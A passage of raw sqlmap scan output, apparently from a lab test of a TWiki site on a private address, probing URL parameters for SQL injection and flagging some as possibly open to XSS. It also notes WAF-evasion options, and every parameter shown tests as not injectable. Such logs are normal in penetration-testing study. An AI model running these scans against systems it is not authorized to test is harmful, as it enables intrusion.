[18:54:25] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:54:25] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:54:26] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:54:26] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:54:26] [INFO] testing 'Oracle AND time-based blind' | |
[18:54:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:54:27] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:54:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:54:36] [WARNING] GET parameter 'rev' is not injectable | |
[18:54:36] [WARNING] GET parameter 'filename' does not appear dynamic | |
[18:54:37] [WARNING] heuristic (basic) test shows that GET parameter 'filename' might not be injectable | |
[18:54:37] [INFO] testing for SQL injection on GET parameter 'filename' | |
[18:54:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:54:38] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:54:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:54:38] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:54:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:54:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:54:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:54:40] [INFO] testing 'MySQL inline queries' | |
[18:54:40] [INFO] testing 'PostgreSQL inline queries' | |
[18:54:40] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:54:40] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:54:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:54:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:54:41] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:54:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:54:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:54:42] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:54:43] [INFO] testing 'Oracle AND time-based blind' | |
[18:54:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:54:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:54:52] [WARNING] GET parameter 'filename' is not injectable | |
[18:54:52] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 68: | |
GET http://192.168.1.113:80/twiki/bin/attach/TWiki/FileAttachment?filename=Sample.txt&revInfo=1 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:54:52] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/attach/TWiki/FileAttachment?filename=Sample.txt&revInfo=1' | |
[18:54:52] [INFO] testing connection to the target URL | |
[18:54:53] [INFO] testing if the target URL is stable | |
[18:54:53] [INFO] target URL is stable | |
[18:54:53] [INFO] testing if GET parameter 'filename' is dynamic | |
[18:54:53] [WARNING] GET parameter 'filename' does not appear dynamic | |
[18:54:54] [WARNING] heuristic (basic) test shows that GET parameter 'filename' might not be injectable | |
[18:54:54] [INFO] heuristic (XSS) test shows that GET parameter 'filename' might be vulnerable to XSS attacks | |
[18:54:54] [INFO] testing for SQL injection on GET parameter 'filename' | |
[18:54:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:54:54] [WARNING] reflective value(s) found and filtering out | |
[18:54:55] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:54:55] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:54:56] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:54:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:54:57] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:54:58] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:54:58] [INFO] testing 'MySQL inline queries' | |
[18:54:58] [INFO] testing 'PostgreSQL inline queries' | |
[18:54:58] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:54:58] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:54:59] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:54:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:54:59] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:55:00] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:55:00] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:55:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:55:01] [INFO] testing 'Oracle AND time-based blind' | |
[18:55:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:55:02] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:55:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:55:14] [WARNING] GET parameter 'filename' is not injectable | |
[18:55:14] [INFO] testing if GET parameter 'revInfo' is dynamic | |
[18:55:14] [WARNING] GET parameter 'revInfo' does not appear dynamic | |
[18:55:14] [WARNING] heuristic (basic) test shows that GET parameter 'revInfo' might not be injectable | |
[18:55:15] [INFO] testing for SQL injection on GET parameter 'revInfo' | |
[18:55:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:55:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:55:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:55:16] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:55:17] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:55:17] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:55:18] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:55:18] [INFO] testing 'MySQL inline queries' | |
[18:55:18] [INFO] testing 'PostgreSQL inline queries' | |
[18:55:18] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:55:18] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:55:19] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:55:19] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:55:20] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:55:20] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:55:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:55:21] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:55:21] [INFO] testing 'Oracle AND time-based blind' | |
[18:55:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:55:28] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:55:33] [WARNING] GET parameter 'revInfo' is not injectable | |
[18:55:33] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[18:55:33] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/attach/TWiki/FileAttachment?filename=Smile.gif&revInfo=1' | |
URL 69: | |
GET http://192.168.1.113:80/twiki/bin/viewfile/TWiki/TWiki/FileAttachment?rev=&filename=Sample.txt | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:55:33] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/viewfile/TWiki/TWiki/FileAttachment?rev=&filename=Sample.txt' | |
[18:55:33] [INFO] testing connection to the target URL | |
sqlmap got a 302 redirect to 'http://192.168.1.113/twiki/bin/oops/TWiki/TWiki/FileAttachment'. Do you want to follow? [Y/n] Y | |
[18:55:34] [INFO] testing if the target URL is stable | |
[18:55:35] [WARNING] GET parameter 'rev' does not appear dynamic | |
[18:55:35] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[18:55:35] [INFO] testing for SQL injection on GET parameter 'rev' | |
[18:55:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:55:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:55:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:55:38] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:55:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:55:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:55:41] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:55:41] [INFO] testing 'MySQL inline queries' | |
[18:55:41] [INFO] testing 'PostgreSQL inline queries' | |
[18:55:41] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:55:41] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:55:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:55:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:55:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:55:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:55:45] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:55:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:55:46] [INFO] testing 'Oracle AND time-based blind' | |
[18:55:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:55:47] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:55:57] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:56:06] [WARNING] GET parameter 'rev' is not injectable | |
[18:56:06] [WARNING] GET parameter 'filename' does not appear dynamic | |
[18:56:06] [WARNING] heuristic (basic) test shows that GET parameter 'filename' might not be injectable | |
[18:56:06] [INFO] testing for SQL injection on GET parameter 'filename' | |
[18:56:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:56:08] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:56:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:56:09] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:56:10] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:56:11] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:56:11] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:56:12] [INFO] testing 'MySQL inline queries' | |
[18:56:12] [INFO] testing 'PostgreSQL inline queries' | |
[18:56:12] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:56:12] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:56:13] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:56:13] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:56:14] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:56:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:56:15] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:56:16] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:56:17] [INFO] testing 'Oracle AND time-based blind' | |
[18:56:18] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:56:27] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:56:37] [WARNING] GET parameter 'filename' is not injectable | |
[18:56:37] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[18:56:37] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/viewfile/TWiki/FileAttachment?rev=1.1&filename=Sample.txt' | |
URL 70: | |
GET http://192.168.1.113:80/twiki/bin/rename/TWiki/FileAttachment?attachment=Sample.txt | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:56:37] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rename/TWiki/FileAttachment?attachment=Sample.txt' | |
[18:56:37] [INFO] testing connection to the target URL | |
[18:56:37] [INFO] testing if the target URL is stable | |
[18:56:38] [INFO] target URL is stable | |
[18:56:38] [INFO] testing if GET parameter 'attachment' is dynamic | |
[18:56:38] [WARNING] GET parameter 'attachment' does not appear dynamic | |
[18:56:38] [WARNING] heuristic (basic) test shows that GET parameter 'attachment' might not be injectable | |
[18:56:38] [INFO] heuristic (XSS) test shows that GET parameter 'attachment' might be vulnerable to XSS attacks | |
[18:56:38] [INFO] testing for SQL injection on GET parameter 'attachment' | |
[18:56:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:56:38] [WARNING] reflective value(s) found and filtering out | |
[18:56:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:56:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:56:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:56:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:56:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:56:42] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:56:42] [INFO] testing 'MySQL inline queries' | |
[18:56:42] [INFO] testing 'PostgreSQL inline queries' | |
[18:56:42] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:56:42] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:56:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:56:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:56:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:56:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:56:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:56:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:56:45] [INFO] testing 'Oracle AND time-based blind' | |
[18:56:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:56:46] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:56:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:56:58] [WARNING] GET parameter 'attachment' is not injectable | |
[18:56:58] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 71: | |
GET http://192.168.1.113/twiki/bin/view/TWiki/TWikiSkins?skin=print | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:56:58] [INFO] testing URL 'http://192.168.1.113/twiki/bin/view/TWiki/TWikiSkins?skin=print' | |
[18:56:58] [INFO] testing connection to the target URL | |
[18:56:58] [INFO] testing if the target URL is stable | |
[18:56:59] [INFO] target URL is stable | |
[18:56:59] [INFO] testing if GET parameter 'skin' is dynamic | |
[18:56:59] [INFO] confirming that GET parameter 'skin' is dynamic | |
[18:56:59] [INFO] GET parameter 'skin' is dynamic | |
[18:56:59] [INFO] heuristics detected web page charset 'ascii' | |
[18:56:59] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable | |
[18:56:59] [INFO] testing for SQL injection on GET parameter 'skin' | |
[18:56:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:56:59] [WARNING] reflective value(s) found and filtering out | |
[18:57:00] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:57:01] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:57:01] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:57:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:57:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:57:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:57:03] [INFO] testing 'MySQL inline queries' | |
[18:57:03] [INFO] testing 'PostgreSQL inline queries' | |
[18:57:03] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:57:03] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:57:04] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:57:04] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:57:05] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:57:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:57:05] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:57:06] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:57:07] [INFO] testing 'Oracle AND time-based blind' | |
[18:57:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:57:07] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:57:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:57:19] [WARNING] GET parameter 'skin' is not injectable | |
[18:57:19] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[18:57:19] [INFO] skipping 'http://192.168.1.113/twiki/bin/view/TWiki/TWikiSkins?skin=plain' | |
URL 72: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiMetaData?raw=debug | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:57:19] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiMetaData?raw=debug' | |
[18:57:19] [INFO] testing connection to the target URL | |
[18:57:20] [INFO] testing if the target URL is stable | |
[18:57:21] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[18:57:21] [INFO] testing if GET parameter 'raw' is dynamic | |
[18:57:21] [WARNING] GET parameter 'raw' does not appear dynamic | |
[18:57:21] [WARNING] heuristic (basic) test shows that GET parameter 'raw' might not be injectable | |
[18:57:21] [INFO] testing for SQL injection on GET parameter 'raw' | |
[18:57:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:57:22] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:57:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:57:23] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:57:23] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:57:24] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:57:24] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:57:24] [INFO] testing 'MySQL inline queries' | |
[18:57:24] [INFO] testing 'PostgreSQL inline queries' | |
[18:57:24] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:57:25] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:57:25] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:57:26] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:57:26] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:57:26] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:57:27] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:57:28] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:57:28] [INFO] testing 'Oracle AND time-based blind' | |
[18:57:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:57:29] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:57:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:57:42] [WARNING] GET parameter 'raw' is not injectable | |
[18:57:42] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 73: | |
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiHistory?rev1=1.10&rev2=1.9 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:57:42] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiHistory?rev1=1.10&rev2=1.9' | |
[18:57:42] [INFO] testing connection to the target URL | |
[18:57:43] [INFO] testing if the target URL is stable | |
[18:57:43] [INFO] target URL is stable | |
[18:57:43] [INFO] testing if GET parameter 'rev1' is dynamic | |
[18:57:45] [INFO] confirming that GET parameter 'rev1' is dynamic | |
[18:57:46] [INFO] GET parameter 'rev1' is dynamic | |
[18:57:46] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable | |
[18:57:46] [INFO] heuristic (XSS) test shows that GET parameter 'rev1' might be vulnerable to XSS attacks | |
[18:57:46] [INFO] testing for SQL injection on GET parameter 'rev1' | |
[18:57:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:57:46] [WARNING] reflective value(s) found and filtering out | |
[18:57:47] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:57:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:57:50] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:57:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:57:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:57:52] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:57:53] [INFO] testing 'MySQL inline queries' | |
[18:57:54] [INFO] testing 'PostgreSQL inline queries' | |
[18:57:55] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:57:56] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:57:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:57:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:57:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:57:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:57:59] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:57:59] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:58:00] [INFO] testing 'Oracle AND time-based blind' | |
[18:58:00] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:58:00] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:58:07] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:58:14] [WARNING] GET parameter 'rev1' is not injectable | |
[18:58:14] [INFO] testing if GET parameter 'rev2' is dynamic | |
[18:58:14] [INFO] confirming that GET parameter 'rev2' is dynamic | |
[18:58:14] [INFO] GET parameter 'rev2' is dynamic | |
[18:58:15] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable | |
[18:58:15] [INFO] heuristic (XSS) test shows that GET parameter 'rev2' might be vulnerable to XSS attacks | |
[18:58:15] [INFO] testing for SQL injection on GET parameter 'rev2' | |
[18:58:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:58:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:58:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:58:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:58:17] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:58:18] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:58:18] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:58:19] [INFO] testing 'MySQL inline queries' | |
[18:58:19] [INFO] testing 'PostgreSQL inline queries' | |
[18:58:19] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:58:19] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:58:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:58:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:58:21] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:58:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:58:21] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:58:22] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:58:23] [INFO] testing 'Oracle AND time-based blind' | |
[18:58:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:58:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:58:36] [WARNING] GET parameter 'rev2' is not injectable | |
[18:58:36] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 74: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiHistory?rev=1.9 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:58:36] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiHistory?rev=1.9' | |
[18:58:36] [INFO] testing connection to the target URL | |
[18:58:37] [INFO] testing if the target URL is stable | |
[18:58:37] [INFO] target URL is stable | |
[18:58:37] [INFO] testing if GET parameter 'rev' is dynamic | |
[18:58:38] [INFO] confirming that GET parameter 'rev' is dynamic | |
[18:58:38] [INFO] GET parameter 'rev' is dynamic | |
[18:58:38] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[18:58:38] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks | |
[18:58:38] [INFO] testing for SQL injection on GET parameter 'rev' | |
[18:58:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:58:38] [WARNING] reflective value(s) found and filtering out | |
[18:58:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:58:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:58:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
